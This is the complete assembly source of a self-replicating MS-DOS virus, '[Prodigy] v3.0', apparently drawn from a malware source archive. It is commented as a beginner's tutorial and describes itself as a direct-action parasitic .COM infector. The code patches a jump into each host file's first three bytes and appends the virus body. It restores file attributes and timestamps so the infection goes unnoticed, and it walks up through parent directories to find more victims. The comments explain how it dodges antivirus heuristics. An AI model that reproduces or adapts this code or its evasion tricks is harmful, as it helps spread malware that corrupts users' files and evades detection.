MalwareSourceCode/MSDOS/P-Index/Virus.MSDOS.Unknown.prodigy3.asm

245 lines
10 KiB
NASM
Raw Permalink Normal View History

2022-08-21 09:07:57 +00:00
; - [Prodigy] v3.0
; Metabolis/VLAD
; _ _ .---------.
; | | |_| | T H E |
; | | _ `---------'
; _____ _____ _____ ___| | | | ______ _ _
; | _ | | .-. | | _ | | _ | | | | ___/ | | | |
; | |_| | | `-' | | |_| | | |_| | | | | |___ | | | |
; | ___| |_|~\_\ |_____| |_____| |_| \_,. | |_|_|_|
; | | .---------------------. | | | |
; | | | - VIRUS! v3.0 - | | | | |
; |_| `---------------------' |_| |_|
;
; - Direct Action, Parasitic .COM infector
; - Restores original attributes and file date/time
; - Searches '..' until there are no more files to infect
; - Won't infect COMMAND.COM
; - Has an infection counter (set to infect 2 at a time right now)
;
; - sure, this virus is simple, and not really worth releasing.. but
; not everyone is up to understanding Qark's level of code,
; certainly not me. So for the people who are just starting off
; take a look at this one. It's the 3rd virus I've written, the
; other 2 definately not worth publishing :) hehe
;
; - Use a86 to compile
org 0100h ; yer COM file starts
; at this mem address
db 0e9h,00h,00h ; jump to begin
begin:
call $+3 ; get the delta offset
next: int 3h ; (overcomes 'E' heuristic)
pop bp ; for the virus and
sub bp, offset next ; stick it in BP
set_dta:
lea si, [bp+offset first3]
mov di, 100h
movsw
movsb
; the virus puts the original three bytes of the program back
; at 100h so all we have to do at the end of the virus is jump
; to 100h and it will execute the infected program as normal
mov byte ptr [bp+counter], 00h ; initialise infection
; counter
mov ah,47h ; get current directory
xor dl,dl ; and put it in currdir
lea si,[bp+offset currdir] ; (dl=0 <- default drive)
int 21h
mov ah,1Ah ; Set DTA to buffer
lea dx,[bp+offset tempDTA] ; so command line params
int 21h ; aren't overwritten
find_first:
mov ah,4eh ; find first file
mov cx,7 ; with any attributes
dec byte ptr [bp+offset mask]
; the reason I dec the '+' in the filemask is because this
; makes it an asterisk. This will get past scanners picking
; up *.COM as a heuristic.
lea dx,[bp+offset mask] ; look for *.COM
int 21h
inc byte ptr [bp+offset mask]
; this restores the '*' in the filemask to '+' for writing
; back to disk.
jnc open_file ; no files to infect..
jmp load_com
fn:
jmp find_next
; find_next is too far from most places so I've set this up to
; make life easier :) it gets around the jump > 128 error.
open_file:
; when a file is found with either find first or find next
; all of its details like size, attributes, name etc are stored
; in an area called DTA which resides at 80h (just before the
; COM itself at 100h). In this case, the DTA has been moved
; to another address. The different details are positioned
; at various positions from 80h. 9eh for instance is the
; position of the filename (ASCIIZ)
cmp word ptr [bp+tempDTA+1eh],'OC' ; don't infect command.com
je fn ; uh oh.. find another file
lea dx,[bp+tempDTA+1eh] ; filename in DTA
mov ax,4301h ; put normal attributes
mov cx,20h ; on the file
int 21h
jc fn ; error, we outta here
mov ax,3D02h ; open that file!
lea dx,[bp+tempDTA+1eh] ; filename in DTA
int 21h
jc fn ; can't open file :(
xchg bx,ax ; put file handle in BX
infect:
mov cx,3 ; read 3 bytes from file
mov ah,03Fh ; and stick them in first3
lea dx,[bp+offset first3]
int 021h
lea cx,word ptr [bp+offset first3] ; put the first 2 bytes of
; the file in cx
add cl,ch ; add the two bytes together
cmp cl,167 ; M+Z=167 ?
je fn
; if I simply compared the first two bytes to 'MZ' (or 'ZM' since
; it would be a word) this would set off a tbscan heuristic, so
; I've used the adding method, although N+Y=167 it is not really
; worth worrying about, I have seen the first two bytes of a COM
; file equal 167 yet.
call lseek_end ; move to the end of the file
sub ax,heap-begin+3 ; subtract the virus length
cmp word ptr [bp+first3+1],ax ; see if jump is to virus
je fn ; file already infected
add ax,heap-begin ; add on to know where to
mov word ptr [bp+infjump+1],ax ; jump to and fix it up
mov ax,4200h ; lseek to beginning of file
cwd ; xor dx,dx
xor cx,cx
int 21h
mov cx,3 ; write 3 bytes to file
mov ah,40h ; (the new jump to the
lea dx,[bp+offset infjump] ; virus)
int 21h
call lseek_end ; move to the end of the file
mov cx,heap-begin ; write the virus
mov ah,40h ; to the end of the
lea dx,[bp+offset begin] ; file
int 21h
call close_file
load_com:
inc byte ptr [bp+counter] ; add one to the counter
cmp byte ptr [bp+counter],2 ; check if X files have
jne find_next ; been infected
mov ah, 1Ah ; restore DTA to original
mov dx, 80h ; position
int 21h
mov ah,3bh ; Change directory
lea dx,[bp+offset slash] ; to the way it was
int 21h ; before the dot dot
mov bx,101h ; we need to jump to 100h
dec bx ; this will knock out a
jmp bx ; tbscan heuristic :)
find_next:
call close_file ; make sure file is closed
mov ah,4fh ; find next file
int 21h
jc dot_dot
jmp open_file ; infect the bastard!
dot_dot:
mov ah,3bh ; change directory
lea dx,[bp+offset dds] ; to '..' from the
int 21h ; current directory
jc load_com
jmp find_first
close_file:
xor cx,cx
mov cl,byte ptr [bp+tempdta+15h] ; get old attr from DTA
lea dx,[bp+TempDTA+1eh] ; position of filename in DTA
mov ax,4301h ; set attr to original
int 21h
mov cx,word ptr [bp+tempDTA+16h] ; date and time
mov dx,word ptr [bp+tempDTA+18h] ; date and time
mov ax,5701h ; set file date/time
int 21h
mov ah,3eh ; close file
int 21h
ret
lseek_end:
mov ax,4202h ; get to the end
cwd ; of the file (xor dx,dx)
xor cx,cx
int 21h
ret
quote db 0dh,0ah
db '[Prodigy] v3.0 by Metabolis/VLAD',0dh,0ah
db '"Feel the jungle vibe baby"',0dh,0ah
db '"In the jungle, In the jungle.."',0dh,0ah
; [Prodigy] v3.0 by Metabolis/VLAD
; "Feel the jungle vibe baby"
; "In the jungle, In the jungle.."
; Quote from "Ruff in the jungle bizness" by the Prodigy :)
infjump db 0e9h,00h,00h ; jump to the virus
first3 db 0cdh,20h,00h ; First 3 bytes of the
; com file that was infected
dds db '..',00 ; '..' for dir recursor
mask db '+','.COM',00 ; filemask (for finding files)
slash db '\' ; fix for currdir
; when you use the get current directory function it doesn't
; put a '\' at the beginning of it, so it's not possible to
; change to the directory if you store it straight away,
; that's why I change to directory from offset slash rather
; than currdir since it's ASCIIZ.. (string ending in a zero)
heap:
currdir db 64 dup (?) ; storage for default dir
counter db 00 ; infection counter
tempdta db 43 dup (?)
; everything after heap doesn't actually get written to disk when
; the virus infects a file.